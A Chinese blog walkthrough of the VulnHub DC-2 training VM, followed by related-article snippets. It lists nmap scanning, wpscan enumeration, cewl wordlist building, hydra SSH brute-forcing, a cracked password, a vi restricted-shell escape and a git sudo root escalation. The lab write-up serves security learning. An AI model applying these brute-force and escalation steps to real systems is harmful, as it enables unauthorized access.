【vulnhub靶场之DC2靶机渗透】

2023-05-16

目录

一、前言

二、渗透过程


一、前言

                                                   
   大家好,又到了快乐的学习时光了,最近也是沉迷于DC系列的靶场,每一次成功拿下靶场后都会学习和总结到很多的东西。今天的受害者是DC-2靶场,话不多说,开整。献上靶场下载地址: https://download.vulnhub.com/dc/DC-2.zip

二、渗透过程

信息收集

nmap 收集主机信息:

命令:
nmap -sn 192.168.175.0/24
nmap -sT -p- --min-rate 3000 192.168.175.133
nmap -A -T4 -p 80,7744  192.168.175.133

 

尝试访问80端口:错误

但是页面出现了dc-2,说明页面出现了重定向,需要修改hosts文件,添加具体的域名和IP地址。

 再次访问:

 发现网站的指纹信息如下:

 使用工具wpscan获取cms的具体信息:

# wpscan --url http://dc-2 --enumerate 

发现暴露用户信息:

 可以尝试使用字典攻击获取网站的的密码,并且网站的7744(非标准ssh端口)开启,获取到密码后可以尝试使用远程连接的方式登录。

# cewl http://dc-2 -w passwd.txt  //生成密码字典

# vim user.txt    //向user.txt文件中写入:admin、jerry、tom用户

#wpscan --url http://dc-2 -U user.txt -P passwd.txt    //密码和用户名爆破

#hydra -L  user.txt -P passwd.txt  -4 192.168.175.133 -s 7744 ssh  //直接使用hydra工具爆破ssh

成功爆破出jerry的密码:adipiscing

 尝试使用hydra工具爆破ssh远登录:

 

 但是tom的权限十分的低,但是能够执行vi,那么试试vi修改环境bash解释器:

(提权查询网站:https://gtfobins.github.io/)

b可以使用:

 修改环境变量:export PATH=/user/sbin:/user/bin:/sbin:/bin

之后就可以使用su命令,切换用户jerry:

suid命令提权貌似不可用,受用sudo尝试:

 存在git sudo提权:

 成功提权到root权限:

                                               

                                   

                                   

  

                                      

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

【vulnhub靶场之DC2靶机渗透】 的相关文章

  • vulnhub靶场之THALES: 1

    x1f680 优质资源分享 x1f680 学习路线指引 xff08 点击解锁 xff09 知识定位人群定位 x1f9e1 Python实战微信订餐小程序 x1f9e1 进阶级本课程是python flask 43 微信小程序的完美结合 xf
  • 【vulnhub靶场之DC2靶机渗透】

    目录 一 前言 二 渗透过程 一 前言 大家好 xff0c 又到了快乐的学习时光了 xff0c 最近也是沉迷于DC系列的靶场 xff0c 每一次成功拿下靶场后都会学习和总结到很多的东西 今天的受害者是DC 2靶场 xff0c 话不多说 xf
  • vulnhub-ica1-通关流程 // Kali & 靶场 & 渗透 & Linux

    vulnhub ica1 通关流程 演示视频 xff1a https www bilibili com video BV1mG411b7to share source 61 copy web amp vd source 61 64a9139
  • vulnhub靶机Thoth-Tech

    下载地址 https download vulnhub com thothtech Thoth Tech ova 主机发现 arp scan l 目标 192 168 21 148 端口扫描 nmap min rate 10000 p 19
  • 利用Vulnhub复现漏洞 - Gitlab 任意文件读取漏洞(CVE-2016-9086)

    Gitlab 任意文件读取漏洞 CVE 2016 9086 Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 Vulnhub官方复现教程 https vulhub org environments gitlab CVE 2
  • 教你怎么用Vulnhub来搭建环境

    0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台 里面大部分的环境是要用VMware或者VirtualBox打开运行的 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场 妈妈再也不用担心我没有靶场练习了
  • 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    JBoss 4 x JBossMQ JMS 反序列化漏洞 CVE 2017 7504 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 发送POC 通过命令 通过 BurpSuit 发送 检测POC是否成功 Vulnhub
  • 利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)

    Jenkins远程命令执行漏洞 CVE 2018 1000861 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 POC 检验 Vulnhub官方复现教程 https vulhub org environments je
  • vulnhub靶机Brainpan

    主机发现 arp scan l 端口扫描 nmap min rate 10000 p 192 168 21 156 服务扫描 nmap sV sT O p9999 10000 192 168 21 156 这个地方感到了有点不对劲 pyth
  • DC-2靶机渗透

    首先获取目标主机ip netdiscover i eth0 r 192 168 88 1 24 对端口进行扫描 只开放了web服务 于是访问web 这里配置本地dns解析 将目标ip地址添加进hosts 成功访问 发现是wordpress
  • 利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

    Jenkins CI 远程代码执行漏洞 CVE 2017 1000353 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 生成序列化字符串 发送数据包 执行命令 检验 Vulnhub官方复现教程 https vulhub
  • 【VulnHub系列】West-Wlid1.1

    实验信息 Kali 192 168 10 106 WestWild 192 168 104 实验过程 通过arp scan查找目标主机 确定目标主机IP192 168 10 104 sudo arp scan interface eth0
  • 使用kali破解win7密码

    虚拟机密码忘了 修改启动顺序为CD 设置虚拟机光盘镜像为kali ISO 这里用的是kali 2017 2 开启按f2进入kali live 模式 fdisk l 查看磁盘分区 找到win7虚拟机所使用的磁盘 mount dev sda1
  • VulnHub DC-8

    确定靶机IP地址 扫描靶机的开放端口 发现靶机开放端口有80 22 访问80端口 扫描网站的目录 发现敏感目录user 访问user目录 发现是登陆界面 使用工具查看网站的CMS 发现网站的nid会变化试一试会不会有sql注入漏洞 加个单引
  • 利用Vulnhub复现漏洞 - Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)

    Joomla 3 4 5 反序列化漏洞 CVE 2015 8562 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 成功情况 并未成功 POC Vulnhub官方复现教程 https vulhub org environ
  • 利用Vulnhub复现漏洞 - 心脏出血漏洞(CVE-2014-0160)

    心脏出血漏洞 CVE 2014 0160 Vulnhub官方复现教程 复现过程 启动环境 漏洞复现 ssltest py Vulnhub官方复现教程 https github com vulhub vulhub blob master op
  • 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)

    Imagetragick 命令执行漏洞 CVE 2016 3714 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 上传POC 反弹shell POC Vulnhub官方复现教
  • 利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)

    OpenSSH 用户名枚举漏洞 CVE 2018 15473 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 CVE 2018 15473 Exploit Vulnhub官方复现教程 https vulhub org e
  • CVE-2018-2894WebLogic未授权任意文件上传

    CVE 2018 2894WebLogic未授权任意文件上传 这个洞的限制就比较多了 限制版本 Oracle WebLogic Server版本 10 3 6 0 12 1 3 0 12 2 1 2 12 2 1 3 限制配置 该漏洞的影响
  • kali之vulhub,medium_socnet

    目录 一 部署环境 二 进行主机发现 arp scan进行扫描 三 使用nmap扫描发现的靶机IP 1 全端口扫描 看服务 2 查看端口所用服务版本 3 登录ip地址看一下 四 扫目录 dirsearch脚本 和windous御剑类似 1

随机推荐

  • Hadoop集群的配置

    一 创建虚拟机 10条消息 CentOS 7 虚拟机的搭建 仄言2997的博客 CSDN博客 1 创建虚拟机 2 安装 CentOS 二 虚拟机网络设置 10条消息 虚拟机网络配置 仄言2997的博客 CSDN博客 三 安装JDK 10条消
  • kali 安全/运维 开源教程2022

    计划制定 简单概述 1 学哪个 学什么 怎么学 首先技术不是被贬值或者说是淘汰 而是每隔一段时间都会出现新的技术 旧技术不会沦落至消失 而是变成基础 或者被打包成一个集成环境 从汇编到c 再到现如今的各种开发语言 发明新技术是为了更好的提高
  • 安装Rstudio Desktop和Rstudio Server免费版本

    Rstudio Desktop 和 Rstudio Server安装 之前一直想要配置Rstudio server xff0c 当时可能未下载正确的rstudio版本 xff0c 所以未能配置成功 今天无意发现我的ubuntu 18 04版
  • 51单片机、外部中断的使用(使用外部中断对LED灯进行操作,当按键按下灯亮、再次按下灯熄灭)

    在上一节 xff0c 我们介绍了中断系统的结构框图 我们知道了怎么配置外部中断 根据原理图P32管脚连接外部中断INT0 xff0c 且独立按键K3也连接P32管脚 xff0c 独立按键的另一端接GND xff0c 而P3管脚默认就是高电平
  • Ubuntu配置zsh、oh-my-zsh、prezto,配置环境变量

    Ubuntu配置zsh oh my zsh prezto xff0c 配置环境变量 1 Ubuntu配置zsh 1 1 为什么我们在Ubuntu上配置zsh替代bash xff1f 不想了解的读者可直接跳过 学过操作系统的读者可能知道 xf
  • Python爬虫lxml实训:使用lxml库爬取以下数据:游戏名称、游戏类型、游戏图片地址、文件大小、游戏热度

    题目要求 爬取数据的链接 https down gamersky com pc 爬取内容 游戏名称 游戏类型 游戏图片地址 文件大小 游戏热度将爬取内容写入文件 解题思路 导入所需要的第三方库 from lxml import etree
  • 2022-3-19(洛谷)

    阶乘数码 xff08 高精乘 xff09 题目描述 求 n 中某个数码出现的次数 输入格式 第一行为 t t 10 xff0c 表示数据组数 接下来 t 行 xff0c 每行一个正整数 n n 1000 和数码 a 输出格式 对于每组数据
  • Ubuntu系统配置网络(图文教程)

    打开vmware中虚拟机菜单中的虚拟机选项卡 在后续选项卡中选择设置选项 随着上一步步骤 xff0c 接下来选择硬件选项卡中的网络适配器选项 下一步我们在右边网络连接模式中的 xff0c 这里我们选择桥接模式 xff0c 虚拟机提供了三种了
  • Java暴力匹配算法——字符串匹配问题

    目录 暴力匹配算法 一 解析 二 图解 三 代码演示 四 输出结果 五 优化 有一个字符串 str1 61 34 BCDABCDABABCDABCABCD 34 xff0c 和一个字符串 str2 61 34 ABCAB 34 现在要判断
  • [PTA]兔子繁衍问题(java)

    一对兔子 xff0c 从出生后第3个月起每个月都生一对兔子 小兔子长到第3个月后每个月又生一对兔子 假如兔子都不死 xff0c 请问第1个月出生的一对兔子 xff0c 至少需要繁衍到第几个月时兔子总数才可以达到N对 xff1f packag
  • 用Java实现水仙花数的打印

    题目要求 xff1a 打印出1 10000范围内的所有的 水仙花数 xff0c 所谓 水仙花数 是指由一个3位数 xff0c 其各位数字立方和等于该数本身 例如 xff0c 153是一个 水仙花数 xff0c 因为153 61 1 3 43
  • 【如何学习网安(浅谈)】

    相信各位小伙伴一定听所过各种黑客的流弊操作 xff0c 键盘声满天飞 呵呵 xff0c 在下也曾幻想过有朝一日能够向当初中国红客一样 xff0c 攻陷漂亮国的白宫网站 将台湾是中国的一部分几个大字狠狠的挂在上面 然而在下不才 xff0c 还
  • 【Linux 主机ssh远程连接暴力破解详解】

    昨天 xff0c 安全老师布置了一个安全的小作业 xff0c 在下想了想 xff0c 做什么好呢 xff1f 最近学了很多 那就做一个Linux主机远程连接的暴力破解密码的作业 一 前期信息搜集 kali 作为黑客主机 xff0c cent
  • Linux-内网穿透frp-linux

    内网穿透frp linux 0 需求1 下载软件配置2 配置sever端 xff08 转接vps服务器 xff09 3 配置client端 xff08 校内Ubuntu电脑或校内网台式机 xff09 4 出现的问题参考 0 需求 想要在校外
  • GeoServer 服务器间同步 自动同步两个geoserver 基于JMS的集群

    教程 根据 https geoserver geo solutions it educational en clustering index html 来安装配置 教程中的GeoServer Active Clustering扩展下载地址过
  • 【Redhat-自动化运维工具ansible的安装和配置】

    ansible是一款自动化运维工具 xff0c 基于Python开发 xff0c 集合了众多运维工具 xff08 puppet cfengine chef func fabric xff09 的优点 xff0c 实现了批量系统配置 批量程序
  • 【Nmap的使用方法】

    目录 一 下载地址 二 功能概括 三 基本的语法规则 四 功能分步详解 1 主机发现 2 端口发现 3 应用程序与版本信息侦测 4 操作系统侦测 5 规避FW ID技术 一 下载地址 nmap官网地址 二 功能概括 基本功能 xff1a 主
  • 【Cobalt strike 渗透测试神器】

    目录 一 前言 安装包下载 主机详情 二 部分模块和Payload介绍 三 基本使用步骤 1 服务端和客户端 2 设置监听 四 配合其他工具反弹shell 1 kali中使用msf 2 CS创建监听 3 metasploit使用exploi
  • 【XSS攻击介绍(一)】

    目录 一 前言 二 攻击条件和漏洞验证方法 三 XSS漏洞分类 四 利用方法 五 XSS payload变形 六 防护总结 一 前言 XSS xff1a 跨站脚本攻击 xff0c 即CSS 利用网页开发时留下的漏洞 xff08 web应用程
  • 【vulnhub靶场之DC2靶机渗透】

    目录 一 前言 二 渗透过程 一 前言 大家好 xff0c 又到了快乐的学习时光了 xff0c 最近也是沉迷于DC系列的靶场 xff0c 每一次成功拿下靶场后都会学习和总结到很多的东西 今天的受害者是DC 2靶场 xff0c 话不多说 xf